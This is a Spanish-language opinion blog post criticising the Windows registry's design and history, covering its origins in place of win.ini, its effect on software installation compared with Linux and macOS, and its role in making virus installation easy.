La cosa se complicó cuando llegó la idea multiusuario a Windows. El win.ini ya no servía, PORQUE SÓLO HABÍA UNO, y diferentes usuarios querían tener diferentes configuraciones. Para mayor desastre los desarrolladores se habían acostumbrado a meter sus configuraciones en el win.ini. Así que la misma mente privilegiada de redmon (u otra todavía más impresionante) dijo ¡Hágase el registro! El registro es una especie de base de datos donde se guardan todo tipo de configuraciones de hardware, de Windows, de programas y de usuario. Todo mezclado, como en el cambalache de Discépolo.

Más adelante (con Windows NT y luego con XP) se introdujo un nuevo sistema de archivos (NTFS) que permitía permisos en los ficheros, y se creó una infraestructura para que cada usuario tuviera su espacio propio, pero ya era demasiado tarde. El registro se había convertido en un auténtico monstruo, una estructura que crece en las máquinas Windows hasta el tamaño de muchos MB y es el verdadero culpable de que los Windows se vuelvan lentos como tortugas en el arranque al cabo de unos meses de uso.

Otra consecuencia sorprendente: un usuario de linux, o de Apple (puesto que MacOS está construído sobre UNIX) es que en estos sistemas se puede instalar un programa, en general, copiando los archivos a cualquier lado (aunque haya un sitio recomendado para colocarlos) y los programas FUNCIONAN sin más. En Windows, como todo el mundo sabe, esto no es posible (salvo casos muy raros, normalmente en programas que vienen del mundo linux). Los programas hay que INSTALARLOS. ¿Por qué? Sencillamente porque además de copiar archivos tienen que meter cosas en el registro.

Lo peor es que ya es demasiado tarde para cambiar los hábitos de los usuarios y los desarrolladores. Todo el mundo es capaz de escribir en el registro y muchísimos programas suponen que pueden escribir donde les parezca: por eso es tan fácil para un virus instalarse en el sistema. Con Windows Vista han hecho un tímido intento de prohibir por defecto y pedir permiso cuando alguien intenta escribir en el registro o en los directorios del sistema, pero las preguntas son tan frecuentes que los usuarios simplemente desactivan esa opción. Y vuelven a estar expuestos.

Es un desastre.

Autor: Francisco Serradilla, poeta y doctor en Informática. Su línea principal de investigación se refiere al desarrollo de Softbots (Robots Software) y Agentes Inteligentes en Internet.

Feeds RSS

Suscribete via email

Enter your email address:

Delivered by FeedBurner